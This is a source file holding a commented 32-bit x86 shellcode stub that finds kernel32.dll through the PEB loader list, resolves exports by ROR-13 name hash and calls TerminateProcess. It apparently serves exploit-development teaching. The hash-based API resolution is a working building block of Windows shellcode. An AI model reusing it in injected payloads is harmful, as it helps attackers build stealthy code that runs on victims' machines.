Find Kernel32.dll Load Address & Function
# 32-bit x86 position-independent stub, kept as one assembler-syntax string
# (the assembler/loader that consumes CODE is not visible in this file).
# Flow: start -> find_kernel32 (walks the PEB loader list to get the
# kernel32.dll image base) -> find_function (resolves an export by ROR-13
# name hash) -> calls the resolved TerminateProcess on the current process.
#
# Register contract shared by the routines below:
#   ebx     = kernel32 image base, set by find_kernel32; find_function keeps
#             it intact because it brackets its work with pushad/popad
#   ebp     = esp at entry; [ebp-4] is a scratch slot used by find_function
#   eax     = resolved function address after find_function returns
#   [esp+4] = the hash argument pushed by the caller of find_function
CODE = (
" start: "
" int3 ;"                       # software breakpoint; traps when run outside a debugger
" mov ebp, esp ;"               # ebp anchors the scratch slot [ebp-4]
" add esp, 0xfffffdfc ;"        # esp -= 0x204 (0xfffffdfc == -0x204); presumably to keep pushes away from the code bytes
" call find_kernel32 ;"         # returns with ebx = kernel32 base
" push 0x78b5b983 ;"            # ROR-13 hash of "TerminateProcess" (the same hash compute_hash below produces)
" call find_function ;"         # eax = address of TerminateProcess; the pushed hash stays on the stack (plain ret, not ret 4)
" xor ecx, ecx ;"
" push ecx ;"                   # uExitCode = 0
" push 0xffffffff ;"            # hProcess = -1, the current-process pseudo-handle
" call eax ;"                   # TerminateProcess(hProcess, uExitCode) - does not return on success
#
# find_kernel32: ebx = image base of the first module in
# InInitializationOrderModuleList whose BaseDllName is exactly 12 UTF-16
# characters long ("kernel32.dll" is 12 chars). Relies on loader ordering:
# any other 12-character name earlier in the list would be picked instead.
# Clobbers ecx, esi, edi, ebx.
" find_kernel32: "
" xor ecx, ecx ;"               # ecx = 0: zero index for the fs: load and the 16-bit zero compared below
" mov esi,fs:[ecx+30h] ;"       # esi = PEB (fs:[0x30] in the 32-bit TEB layout)
" mov esi,[esi+0Ch] ;"          # esi = PEB->Ldr
" mov esi,[esi+1Ch] ;"          # esi = Ldr->InInitializationOrderModuleList.Flink
" next_module: "
" mov ebx, [esi+8h] ;"          # ebx = DllBase (offset relative to the InInitializationOrder links)
" mov edi, [esi+20h] ;"         # edi = BaseDllName.Buffer (UTF-16)
" mov esi, [esi] ;"             # esi = next entry (Flink); advanced before the test so the loop is re-entrant
" cmp [edi+12*2], cx ;"         # is wide char #12 NUL, i.e. is the name exactly 12 characters?
" jne next_module ;"
# NOTE(review): no `ret` here. Control falls through into find_function with
# an unrelated stack value at [esp+0x24]; it hashes every kernel32 export,
# (almost certainly) matches none, and returns to `start` via find_function's
# popad/ret. It works only because pushad/popad preserves ebx; an explicit
# `ret` would state the intent and skip the wasted pass over the export table.
#
# find_function: resolve an export of the module at ebx by ROR-13 name hash.
# In:   ebx = image base, [esp+4] = hash (pushed by the caller)
# Out:  eax = function address on a match; eax unchanged when no name matches
# pushad frame used below: [esp+0x1c] = saved eax (the return slot),
# [esp+0x20] = return address, [esp+0x24] = hash argument.
" find_function: "
" pushad ;"                     # save all GPRs; popad at the end restores them (eax slot is patched on success)
" mov eax, [ebx+0x3c] ;"        # eax = e_lfanew (RVA of the PE header)
" mov edi, [ebx+eax+0x78] ;"    # edi = DataDirectory[0].VirtualAddress = export directory RVA (32-bit optional header)
" add edi, ebx ;"               # RVA -> VA
" mov ecx, [edi+0x18] ;"        # ecx = NumberOfNames (loop counter, walked from the last name down to 0)
" mov eax, [edi+0x20] ;"        # eax = AddressOfNames RVA
" add eax, ebx ;"
" mov [ebp-4], eax ;"           # stash AddressOfNames VA in the scratch slot; eax is reused below
" find_function_loop: "
" jecxz find_function_finished ;"   # all names tried and none matched: return with eax untouched
" dec ecx ;"                    # ecx = index of the next name to test
" mov eax, [ebp-4] ;"
" mov esi, [eax+ecx*4] ;"       # esi = RVA of name[ecx]
" add esi, ebx ;"               # esi = VA of the NUL-terminated name string
# compute_hash: edx = hash of the string at esi, where for each byte c:
#   hash = ror(hash, 13) + c, starting from 0.
" compute_hash: "
" xor eax, eax ;"               # eax = 0 so that lodsb leaves eax = zero-extended byte
" cdq ;"                        # edx = 0 (sign-extension of eax = 0): running hash
" cld ;"                        # lodsb must advance esi forward
" compute_hash_again: "
" lodsb ;"                      # al = *esi++
" test al, al ;"
" jz compute_hash_finished ;"   # NUL terminator ends the string
" ror edx, 0x0d ;"
" add edx, eax ;"
" jmp compute_hash_again ;"
" compute_hash_finished: "
" find_function_compare: "
" cmp edx, [esp+0x24] ;"        # compare against the requested hash (caller's push, above the pushad frame + return address)
" jnz find_function_loop ;"
" mov edx, [edi+0x24] ;"        # edx = AddressOfNameOrdinals RVA
" add edx, ebx ;"
" mov cx, [edx+2*ecx] ;"        # cx = ordinal for name index ecx (16-bit table; upper half of ecx keeps the old index's high bits, 0 for any realistic export count)
" mov edx, [edi+0x1c] ;"        # edx = AddressOfFunctions RVA
" add edx, ebx ;"
" mov eax, [edx+4*ecx] ;"       # eax = function RVA indexed by ordinal
" add eax, ebx ;"               # eax = function VA
" mov [esp+0x1c], eax ;"        # overwrite the saved-eax slot so popad hands the address back in eax
" find_function_finished: "
" popad ;"
" ret "                         # plain ret: the caller's pushed hash remains on the stack
)